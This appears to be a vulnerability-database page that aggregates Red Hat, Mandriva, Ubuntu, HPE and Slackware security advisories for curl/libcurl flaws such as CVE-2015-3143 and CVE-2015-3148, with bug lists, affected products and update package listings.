Using the "--retry" option with the curl utility could cause curl to terminate unexpectedly with a segmentation fault. Now, adding "--retry" no longer causes curl to crash. (BZ#1009455)
-
The "curl --trace-time" command did not use the correct local time when printing timestamps. Now, "curl --trace-time" works as expected. (BZ#1120196)
-
The valgrind utility could report dynamically allocated memory leaks on curl exit. Now, curl performs a global shutdown of the NetScape Portable Runtime (NSPR) library on exit, and valgrind no longer reports the memory leaks. (BZ#1146528)
-
Previously, libcurl returned an incorrect value of the CURLINFO_HEADER_SIZE field when a proxy server appended its own headers to the HTTP response. Now, the returned value is valid. (BZ#1161163)
Enhancements:
-
The "--tlsv1.0", "--tlsv1.1", and "--tlsv1.2" options are available for specifying the minor version of the TLS protocol to be negotiated by NSS. The "--tlsv1" option now negotiates the highest version of the TLS protocol supported by both the client and the server. (BZ#1012136)
-
It is now possible to explicitly enable or disable the ECC and the new AES cipher suites to be used for TLS. (BZ#1058767, BZ#1156422)
All curl users are advised to upgrade to these updated packages, which contain backported patches to correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
835898 - Bug in DNS cache causes connections until restart of libcurl-using processes 883002 - curl used with file:// protocol opens and closes a destination file twice 997185 - sendrecv.c example incorrect type for sockfd 1008178 - curl scp download fails in fips mode 1011083 - CA certificate cannot be specified by nickname [documentation bug] 1011101 - manpage typos found using aspell 1058767 - curl does not support ECDSA certificates 1104160 - Link in curl man page is wrong 1136154 - CVE-2014-3613 curl: incorrect handling of IP addresses in cookie domain 1154059 - curl: Disable out-of-protocol fallback to SSL 3.0 1154747 - NTLM: ignore CURLOPT_FORBID_REUSE during NTLM HTTP auth 1154941 - CVE-2014-3707 curl: incorrect handle duplication after COPYPOSTFIELDS 1156422 - curl does not allow explicit control of DHE ciphers 1161163 - Response headers added by proxy servers missing in CURLINFO_HEADER_SIZE 1168137 - curl closes connection after HEAD request fails 1178692 - CVE-2014-8150 curl: URL request injection vulnerability in parseurlandfillconn() 1213306 - CVE-2015-3143 curl: re-using authenticated connection when unauthenticated 1213351 - CVE-2015-3148 curl: Negotiate not treated as connection-oriented
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: curl-7.19.7-46.el6.src.rpm
i386: curl-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.i686.rpm
x86_64: curl-7.19.7-46.el6.x86_64.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.x86_64.rpm libcurl-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: curl-debuginfo-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.i686.rpm
x86_64: curl-debuginfo-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.x86_64.rpm libcurl-devel-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: curl-7.19.7-46.el6.src.rpm
x86_64: curl-7.19.7-46.el6.x86_64.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.x86_64.rpm libcurl-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: curl-debuginfo-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.x86_64.rpm libcurl-devel-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: curl-7.19.7-46.el6.src.rpm
i386: curl-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.i686.rpm
ppc64: curl-7.19.7-46.el6.ppc64.rpm curl-debuginfo-7.19.7-46.el6.ppc.rpm curl-debuginfo-7.19.7-46.el6.ppc64.rpm libcurl-7.19.7-46.el6.ppc.rpm libcurl-7.19.7-46.el6.ppc64.rpm libcurl-devel-7.19.7-46.el6.ppc.rpm libcurl-devel-7.19.7-46.el6.ppc64.rpm
s390x: curl-7.19.7-46.el6.s390x.rpm curl-debuginfo-7.19.7-46.el6.s390.rpm curl-debuginfo-7.19.7-46.el6.s390x.rpm libcurl-7.19.7-46.el6.s390.rpm libcurl-7.19.7-46.el6.s390x.rpm libcurl-devel-7.19.7-46.el6.s390.rpm libcurl-devel-7.19.7-46.el6.s390x.rpm
x86_64: curl-7.19.7-46.el6.x86_64.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.x86_64.rpm libcurl-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.x86_64.rpm libcurl-devel-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: curl-7.19.7-46.el6.src.rpm
i386: curl-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.i686.rpm
x86_64: curl-7.19.7-46.el6.x86_64.rpm curl-debuginfo-7.19.7-46.el6.i686.rpm curl-debuginfo-7.19.7-46.el6.x86_64.rpm libcurl-7.19.7-46.el6.i686.rpm libcurl-7.19.7-46.el6.x86_64.rpm libcurl-devel-7.19.7-46.el6.i686.rpm libcurl-devel-7.19.7-46.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3613 https://access.redhat.com/security/cve/CVE-2014-3707 https://access.redhat.com/security/cve/CVE-2014-8150 https://access.redhat.com/security/cve/CVE-2015-3143 https://access.redhat.com/security/cve/CVE-2015-3148 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3143 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3148 http://advisories.mageia.org/MGASA-2015-0179.html
Updated Packages:
Mandriva Business Server 1/X86_64: fd3f4894f5c5215c29b84d70f2c6ada2 mbs1/x86_64/curl-7.24.0-3.9.mbs1.x86_64.rpm a00d0747b4d6ae22475948119a42efc4 mbs1/x86_64/curl-examples-7.24.0-3.9.mbs1.x86_64.rpm d5291ae320dd5766e4b981ff66b36e19 mbs1/x86_64/lib64curl4-7.24.0-3.9.mbs1.x86_64.rpm 62d5295190433ca4ff7d2cda746d6b16 mbs1/x86_64/lib64curl-devel-7.24.0-3.9.mbs1.x86_64.rpm 5bcf6538291f947870a9ccfe62c9ea6d mbs1/SRPMS/curl-7.24.0-3.9.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
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Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
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"data": "cURL and libcurl 7.10.6 through 7.41.0 does not properly re-use NTLM connections, which allows remote attackers to connect as other users via an unauthenticated request, a similar issue to CVE-2014-0015. cURL/libcURL is prone to a remote security-bypass vulnerability. \nAn attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. \ncURL/libcURL 7.10.6 through versions 7.41.0 are vulnerable. Both Haxx curl and libcurl are products of the Swedish company Haxx. curl is a set of file transfer tools that use URL syntax to work on the command line. libcurl is a free, open source client-side URL transfer library. ============================================================================\nUbuntu Security Notice USN-2591-1\nApril 30, 2015\n\ncurl vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.04\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in curl. \n\nSoftware Description:\n- curl: HTTP, HTTPS, and FTP client and client libraries\n\nDetails:\n\nParas Sethia discovered that curl could incorrectly re-use NTLM HTTP\ncredentials when subsequently connecting to the same host over HTTP. \n(CVE-2015-3143)\n\nHanno B=C3=B6ck discovered that curl incorrectly handled zero-length host names. \nIf a user or automated system were tricked into using a specially crafted\nhost name, an attacker could possibly use this issue to cause curl to\ncrash, resulting in a denial of service, or possibly execute arbitrary\ncode. This issue only affected Ubuntu 14.10 and Ubuntu 15.04. \nIf a user or automated system were tricked into parsing a specially crafted\ncookie, an attacker could possibly use this issue to cause curl to crash,\nresulting in a denial of service, or possibly execute arbitrary code. This\nissue only affected Ubuntu 14.04 LTS, Ubuntu 14.10 and Ubuntu 15.04. \n(CVE-2015-3145)\n\nIsaac Boukris discovered that when using Negotiate authenticated\nconnections, curl could incorrectly authenticate the entire connection and\nnot just specific HTTP requests. (CVE-2015-3148)\n\nYehezkel Horowitz and Oren Souroujon discovered that curl sent HTTP headers\nboth to servers and proxies by default, contrary to expectations. This\nissue only affected Ubuntu 14.10 and Ubuntu 15.04. (CVE-2015-3153)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 15.04:\n libcurl3 7.38.0-3ubuntu2.2\n libcurl3-gnutls 7.38.0-3ubuntu2.2\n libcurl3-nss 7.38.0-3ubuntu2.2\n\nUbuntu 14.10:\n libcurl3 7.37.1-1ubuntu3.4\n libcurl3-gnutls 7.37.1-1ubuntu3.4\n libcurl3-nss 7.37.1-1ubuntu3.4\n\nUbuntu 14.04 LTS:\n libcurl3 7.35.0-1ubuntu2.5\n libcurl3-gnutls 7.35.0-1ubuntu2.5\n libcurl3-nss 7.35.0-1ubuntu2.5\n\nUbuntu 12.04 LTS:\n libcurl3 7.22.0-3ubuntu4.14\n libcurl3-gnutls 7.22.0-3ubuntu4.14\n libcurl3-nss 7.22.0-3ubuntu4.14\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c04986859\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04986859\nVersion: 1\n\nHPSBHF03544 rev.1 - HPE iMC PLAT and other HP and H3C products using Comware\n7 and cURL, Remote Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2016-02-19\nLast Updated: 2016-02-19\n\nPotential Security Impact: Remote Unauthorized Access\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities in cURL and libcurl have been addressed\nwith HPE iMC PLAT and other HP and H3C products using Comware 7. The\nvulnerabilities could be exploited remotely resulting in unauthorized access. \n\nReferences:\n\n - CVE-2015-3143\n - CVE-2015-3148\n - SSRT102110\n - PSRT110028\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nPlease refer to the RESOLUTION\n below for a list of impacted products. \n\nNote: all product versions are impacted prior to the fixed versions listed. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-3143 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2015-3148 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\nHPE has released the following software updates to resolve the\nvulnerabilities in Comware 7 and iMC Plat. \n\n**COMWARE 7 Products**\n\n + 12500 (Comware 7) R7375\n * HP Network Products\n - JC085A HP A12518 Switch Chassis\n - JC086A HP A12508 Switch Chassis\n - JC652A HP 12508 DC Switch Chassis\n - JC653A HP 12518 DC Switch Chassis\n - JC654A HP 12504 AC Switch Chassis\n - JC655A HP 12504 DC Switch Chassis\n - JF430A HP A12518 Switch Chassis\n - JF430B HP 12518 Switch Chassis\n - JF430C HP 12518 AC Switch Chassis\n - JF431A HP A12508 Switch Chassis\n - JF431B HP 12508 Switch Chassis\n - JF431C HP 12508 AC Switch Chassis\n - JC072B HP 12500 Main Processing Unit\n - JG497A HP 12500 MPU w/Comware V7 OS\n - JG782A HP FF 12508E AC Switch Chassis\n - JG783A HP FF 12508E DC Switch Chassis\n - JG784A HP FF 12518E AC Switch Chassis\n - JG785A HP FF 12518E DC Switch Chassis\n - JG802A HP FF 12500E MPU\n - JG836A HP FlexFabric 12518E AC Switch TAA-compliant Chassis\n - JG834A HP FlexFabric 12508E AC Switch TAA-compliant Chassis\n - JG835A HP FlexFabric 12508E DC Switch TAA-compliant Chassis\n - JG837A HP FlexFabric 12518E DC Switch TAA-compliant Chassis\n - JG803A HP FlexFabric 12500E TAA-compliant Main Processing Unit\n - JG796A HP FlexFabric 12500 48-port 10GbE SFP+ FD Module\n - JG790A HP FlexFabric 12500 16-port 40GbE QSFP+ FD Module\n - JG794A HP FlexFabric 12500 40-port 10GbE SFP+ FG Module\n - JG792A HP FlexFabric 12500 40-port 10GbE SFP+ FD Module\n - JG788A HP FlexFabric 12500 4-port 100GbE CFP FG Module\n - JG786A HP FlexFabric 12500 4-port 100GbE CFP FD Module\n - JG797A HP FlexFabric 12500 48-port 10GbE SFP+ FD TAA-compliant Module\n - JG791A HP FlexFabric 12500 16-port 40GbE QSFP+ FD TAA-compliant\nModule\n - JG795A HP FlexFabric 12500 40-port 10GbE SFP+ FG TAA-compliant Module\n - JG793A HP FlexFabric 12500 40-port 10GbE SFP+ FD TAA-compliant Module\n - JG789A HP FlexFabric 12500 4-port 100GbE CFP FG TAA-compliant Module\n - JG787A HP FlexFabric 12500 4-port 100GbE CFP FD TAA-compliant Module\n - JG798A HP FlexFabric 12508E Fabric Module\n * H3C Products\n - H3C S12508 Routing Switch (AC-1) (0235A0GE)\n - H3C S12518 Routing Switch (AC-1) (0235A0GF)\n - H3C S12508 Chassis (0235A0E6)\n - H3C S12508 Chassis (0235A38N)\n - H3C S12518 Chassis (0235A0E7)\n - H3C S12518 Chassis (0235A38M)\n - H3C 12508 DC Switch Chassis (0235A38L)\n - H3C 12518 DC Switch Chassis (0235A38K)\n + 10500 (Comware 7) R7168\n * HP Network Products\n - JC611A HP 10508-V Switch Chassis\n - JC612A HP 10508 Switch Chassis\n - JC613A HP 10504 Switch Chassis\n - JC748A HP 10512 Switch Chassis\n - JG820A HP 10504 TAA Switch Chassis\n - JG821A HP 10508 TAA Switch Chassis\n - JG822A HP 10508-V TAA Switch Chassis\n - JG823A HP 10512 TAA Switch Chassis\n - JG496A HP 10500 Type A MPU w/Comware v7 OS\n - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n - JH191A HP 10500 44-port GbE(SFP,LC)/ 4-port 10GbE SFP+ (SFP+,LC) SE\nModule\n - JH192A HP 10500 48-port Gig-T (RJ45) SE Module\n - JH193A HP 10500 16-port 10GbE SFP+ (SFP+,LC) SF Module\n - JH194A HP 10500 24-port 10GbE SFP+ (SFP+,LC) EC Module\n - JH195A HP 10500 6-port 40GbE QSFP+ EC Module\n - JH196A HP 10500 2-port 100GbE CFP EC Module\n - JH197A HP 10500 48-port 10GbE SFP+ (SFP+,LC) SG Module\n + 12900 (Comware 7) R1137\n * HP Network Products\n - JG619A HP FlexFabric 12910 Switch AC Chassis\n - JG621A HP FlexFabric 12910 Main Processing Unit\n - JG632A HP FlexFabric 12916 Switch AC Chassis\n - JG634A HP FlexFabric 12916 Main Processing Unit\n - JH104A HP FlexFabric 12900E Main Processing Unit\n - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n - JH263A HP FlexFabric 12904E Main Processing Unit\n - JH255A HP FlexFabric 12908E Switch Chassis\n - JH262A HP FlexFabric 12904E Switch Chassis\n - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n - JH103A HP FlexFabric 12916E Switch Chassis\n + 5900 (Comware 7) R2422P01\n * HP Network Products\n - JC772A HP 5900AF-48XG-4QSFP+ Switch\n - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n + 5920 (Comware 7) R2422P01\n * HP Network Products\n - JG296A HP 5920AF-24XG Switch\n - JG555A HP 5920AF-24XG TAA Switch\n + MSR1000 (Comware 7) R0304P04\n * HP Network Products\n - JG875A HP MSR1002-4 AC Router\n - JH060A HP MSR1003-8S AC Router\n + MSR2000 (Comware 7) R0304P04\n * HP Network Products\n - JG411A HP MSR2003 AC Router\n - JG734A HP MSR2004-24 AC Router\n - JG735A HP MSR2004-48 Router\n - JG866A HP MSR2003 TAA-compliant AC Router\n + MSR3000 (Comware 7) R0304P04\n * HP Network Products\n - JG404A HP MSR3064 Router\n - JG405A HP MSR3044 Router\n - JG406A HP MSR3024 AC Router\n - JG407A HP MSR3024 DC Router\n - JG408A HP MSR3024 PoE Router\n - JG409A HP MSR3012 AC Router\n - JG410A HP MSR3012 DC Router\n - JG861A HP MSR3024 TAA-compliant AC Router\n + MSR4000 (Comware 7) R0304P04\n * HP Network Products\n - JG402A HP MSR4080 Router Chassis\n - JG403A HP MSR4060 Router Chassis\n - JG412A HP MSR4000 MPU-100 Main Processing Unit\n - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n + VSR (Comware 7) E0321\n * HP Network Products\n - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n + 7900 (Comware 7) R2137\n * HP Network Products\n - JG682A HP FlexFabric 7904 Switch Chassis\n - JG841A HP FlexFabric 7910 Switch Chassis\n - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n + 5130 (Comware 7) R3109P09\n * HP Network Products\n - JG932A HP 5130-24G-4SFP+ EI Switch\n - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n - JG934A HP 5130-48G-4SFP+ EI Switch\n - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n + 5700 (Comware 7) R2422P01\n * HP Network Products\n - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n + 5930 (Comware 7) R2422P01\n * HP Network Products\n - JG726A HP FlexFabric 5930 32QSFP+ Switch\n - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n - JH179A HP FlexFabric 5930 4-slot Switch\n - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n + HSR6602 (Comware 7) R7103P05\n * HP Network Products\n - JG353A HP HSR6602-G Router\n - JG354A HP HSR6602-XG Router\n - JG776A HP HSR6602-G TAA-compliant Router\n - JG777A HP HSR6602-XG TAA-compliant Router\n + HSR6800 (Comware 7) R7103P05\n * HP Network Products\n - JG361A HP HSR6802 Router Chassis\n - JG361B HP HSR6802 Router Chassis\n - JG362A HP HSR6804 Router Chassis\n - JG362B HP HSR6804 Router Chassis\n - JG363A HP HSR6808 Router Chassis\n - JG363B HP HSR6808 Router Chassis\n - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n - JH075A) HP HSR6800 RSE-X3 Router Main Processing Unit\n + 1950 R3109P09\n * HP Network Products\n - JG960A HP 1950-24G-4XG Switch\n - JG961A HP 1950-48G-2SFP+-2XGT Switch\n - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n\n**iMC**\n\n + iMC Plat iMC Plat 7.1 (E0303P13)\n * HP Network Products\n - JD125A HP IMC Std S/W Platform w/100-node\n - JD126A HP IMC Ent S/W Platform w/100-node\n - JD808A HP IMC Ent Platform w/100-node License\n - JD814A HP A-IMC Enterprise Edition Software DVD Media\n - JD815A HP IMC Std Platform w/100-node License\n - JD816A HP A-IMC Standard Edition Software DVD Media\n - JF288AAE HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n - JF289AAE HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n - JF377A HP IMC Std S/W Platform w/100-node Lic\n - JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU\n - JF378A HP IMC Ent S/W Platform w/200-node Lic\n - JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU\n - JG546AAE HP IMC Basic SW Platform w/50-node E-LTU\n - JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n - JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU\n - JG550AAE HP PMM to IMC Bsc WLM Upgr w/150AP E-LTU\n - JG590AAE HP IMC Bsc WLAN Mgr SW Pltfm 50 AP E-LTU\n - JG659AAE HP IMC Smart Connect VAE E-LTU\n - JG660AAE HP IMC Smart Connect w/WLM VAE E-LTU\n - JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU\n - JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n - JG766AAE HP IMC SmCnct Vrtl Applnc SW E-LTU\n - JG767AAE HP IMC SmCnct WSM Vrtl Applnc SW E-LTU\n - JG768AAE HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n\nHISTORY\nVersion:1 (rev.1) - 19 February 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability with any HPE supported\nproduct, send Email to: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. 7) - x86_64\n\n3. \n(BZ#1154060)\n\n* TLS 1.1 and TLS 1.2 are no longer disabled by default in libcurl. (BZ#1170339)\n\n* FTP operations such as downloading files took a significantly long time\nto complete. Now, the FTP implementation in libcurl correctly sets blocking\ndirection and estimated timeout for connections, resulting in faster FTP\ntransfers. (BZ#1066065)\n\n* The libcurl library did not implement a non-blocking SSL handshake, which\nnegatively affected performance of applications based on the libcurl multi\nAPI. The non-blocking SSL handshake has been implemented in libcurl, and\nthe libcurl multi API now immediately returns the control back to the\napplication whenever it cannot read or write data from or to the underlying\nnetwork socket. (BZ#1091429)\n\n* The libcurl library used an unnecessarily long blocking delay for actions\nwith no active file descriptors, even for short operations. Some actions,\nsuch as resolving a host name using /etc/hosts, took a long time to\ncomplete. The blocking code in libcurl has been modified so that the\ninitial delay is short and gradually increases until an event occurs. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/curl-7.45.0-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3143\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3144\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3145\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3148\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3236\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3237\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/curl-7.45.0-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/curl-7.45.0-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/curl-7.45.0-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/curl-7.45.0-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/curl-7.45.0-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/curl-7.45.0-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/curl-7.45.0-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/curl-7.45.0-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/curl-7.45.0-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/curl-7.45.0-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/curl-7.45.0-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/curl-7.45.0-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\ne9307566f43c3c12ac72f12cea688741 curl-7.45.0-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n5fe5a7733ce969f8f468c6b03cf6b1f7 curl-7.45.0-x86_64-1_slack13.0.txz\n\nSlackware 13.1 